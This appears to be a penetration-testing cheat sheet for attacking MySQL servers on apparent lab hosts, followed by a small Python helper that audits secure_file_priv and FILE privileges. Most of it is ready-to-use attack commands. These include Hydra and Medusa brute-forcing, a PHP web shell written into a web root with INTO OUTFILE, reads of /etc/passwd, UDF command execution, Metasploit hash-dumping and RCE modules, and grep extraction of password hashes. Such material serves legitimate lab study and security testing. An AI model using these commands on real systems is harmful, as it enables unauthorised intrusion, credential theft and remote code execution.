Resources

Cheat sheet

Commands

  • Network Scans
    • Nmap Version Scan
      nmap -sV -p 3306 10.129.33.112
    • Metasploit Version Scan
      use auxiliary/scanner/mysql/mysql_version
  • Vulnerability Scans
    • Check for old auth bypass vulnerability (Metasploit)
      use auxiliary/scanner/mysql/mysql_authbypass_hashdump

      Affects MySQL before 5.1.63, 5.5.24, 5.6.6 and MariaDB before 5.1.62, 5.2.12, 5.3.6, 5.5.23

  • Connecting with mysql client
    • Connect as root locally (no password)
      mysql -u root
    • Connect as root locally (with password prompt)
      mysql -u root -p
    • Connect to a remote host with credentials
      mysql -h 10.129.33.112 -u robin -probin
    • Connect and execute a single command
      mysql -h 10.129.29.249 -u robin -probin -e 'show databases;'
  • Brute-Force Tools
    • Hydra
      hydra -L x.txt -P x.txt 10.129.29.249 mysql
    • Medusa
      medusa -h 10.129.29.249 -U x.txt -P x.txt -f -M mysql
    • Metasploit
      use auxiliary/scanner/mysql/mysql_login
  • Initial Enumeration
    • Get system and database information.
      select version();
      select user();
      select database();
      show databases;
      use customers;
      show tables;
      describe myTable;
  • Privilege & Configuration Auditing
    • Check the current user’s privileges.
      show grants for current_user();
      select user,file_priv from mysql.user where user='robin';

      Look for the FILE privilege (file_priv = 'Y'). An account that holds it can read and write files on the server, subject to the secure_file_priv setting checked next.

    • Check the secure_file_priv variable, which controls file I/O.
      show variables like 'secure_file_priv';

      Understanding secure_file_priv

      • Empty/Blank: You can read/write files anywhere on the server that the MySQL process has permissions to. (Very dangerous)
      • A Path (e.g., /var/lib/mysql-files/): You are restricted to reading/writing files only within that specific folder. (More secure)
      • NULL: File I/O with LOAD_FILE() and INTO OUTFILE is completely disabled. (Most secure)
  • File I/O Exploitation
    • Write a test file to a permitted directory.
      SELECT 'hello_from_mysql' INTO OUTFILE '/var/lib/mysql-files/test.txt';
    • Write a web shell to a web root directory.
      select "<?php echo shell_exec($_GET['c']);?>" into OUTFILE 'C:/xampp/htdocs/back.php';
    • Read a file from the server.
      SELECT LOAD_FILE('/var/lib/mysql-files/test.txt');
      select load_file('/etc/passwd');
    • Read a file using LOAD DATA (with the LOCAL keyword the file is read from the client host, not the server).
      LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';
  • Advanced Commands & RCE
    • Execute OS commands via UDF (if a vulnerable function like do_system exists).
      select do_system('id');
    • Spawn a local shell from the client (does not execute on the server).
      \! sh
    • Change a user’s password (requires high privileges; the PASSWORD() syntax below applies to MySQL before 5.7).
      UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
      FLUSH PRIVILEGES;
  • Metasploit Post-Exploitation (with Credentials)
    • Enumerate privileges, hashes, and databases.
      use auxiliary/admin/mysql/mysql_enum
    • Dump the database schema.
      use auxiliary/scanner/mysql/mysql_schemadump
    • Dump user password hashes.
      use auxiliary/scanner/mysql/mysql_hashdump
    • Achieve RCE via startup parameters (Windows).
      use exploit/windows/mysql/mysql_start_up
  • Dumping Hashes from MySQL Files (on the host)
    grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
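Audit helper for the two configuration checks listed under Privilege & Configuration Auditing (the secure_file_priv variable and the FILE privilege). It is an added example, not part of the original cheat sheet; it assumes absolute POSIX paths, the three secure_file_priv states as listed above, and uses constructed sample data and function names of its own.

```python
import posixpath

def classify_secure_file_priv(value):
    """Map a secure_file_priv value to one of the three states listed in the
    cheat sheet. Accepts None (SQL NULL through a connector) or the literal
    string 'NULL' as printed by the mysql client."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"      # LOAD_FILE() / INTO OUTFILE cannot be used at all
    if value.strip() == "":
        return "unrestricted"  # any path the mysqld process can reach
    return "restricted"        # only inside the configured directory

def path_allowed(secure_file_priv, target):
    """Would the server permit file I/O on `target` under this setting?
    Assumes absolute POSIX paths; normalises '..' so a traversal out of the
    directory is refused. OS permissions and symlinks are not modelled."""
    state = classify_secure_file_priv(secure_file_priv)
    if state == "disabled":
        return False
    if state == "unrestricted":
        return True
    base = posixpath.normpath(secure_file_priv)
    norm = posixpath.normpath(target)
    if not posixpath.isabs(norm):
        return False  # only absolute paths are modelled (assumption)
    return posixpath.commonpath([base, norm]) == base

def audit(secure_file_priv, user_rows):
    """user_rows: (user, file_priv) tuples from
    `select user,file_priv from mysql.user`. Each FILE-privileged account is
    rated against the server-wide secure_file_priv state."""
    state = classify_secure_file_priv(secure_file_priv)
    severity = {"unrestricted": "high", "restricted": "medium", "disabled": "low"}
    findings = [(user, severity[state]) for user, priv in user_rows if priv == "Y"]
    return {"secure_file_priv": state, "file_priv_accounts": findings}

# Constructed sample input (not from a real server): the common packaged
# default directory plus three accounts, two of them holding FILE.
SAMPLE_SECURE_FILE_PRIV = "/var/lib/mysql-files/"
SAMPLE_USERS = [("root", "Y"), ("robin", "Y"), ("app", "N")]

if __name__ == "__main__":
    print(audit(SAMPLE_SECURE_FILE_PRIV, SAMPLE_USERS))
    print(path_allowed(SAMPLE_SECURE_FILE_PRIV, "/etc/passwd"))
```

Feed it the output of the two queries above to see whether a FILE-privileged account is actually contained by secure_file_priv or has unrestricted file access.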

Notes

Configuration Files

MySQL configuration is stored in a my.cnf (Linux) or my.ini (Windows) file. Common locations include:

Unix/Linux:

  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /var/lib/mysql/my.cnf
  • ~/.my.cnf

Windows:

  • my.ini
  • windows\my.ini
  • winnt\my.ini

Useful Files & Locations

  • Data Directory: /var/lib/mysql/ or /mysql/data/
  • Command History: ~/.mysql.history
  • Log Files: connections.log, update.log, common.log

UDF Exploit Architecture

The popular UDF dynamic library exploits generally work on MySQL/MariaDB versions 4.x and 5.x. The architecture of the exploit library (32-bit vs 64-bit) must match the architecture of the target MySQL server.

MySQL Architecture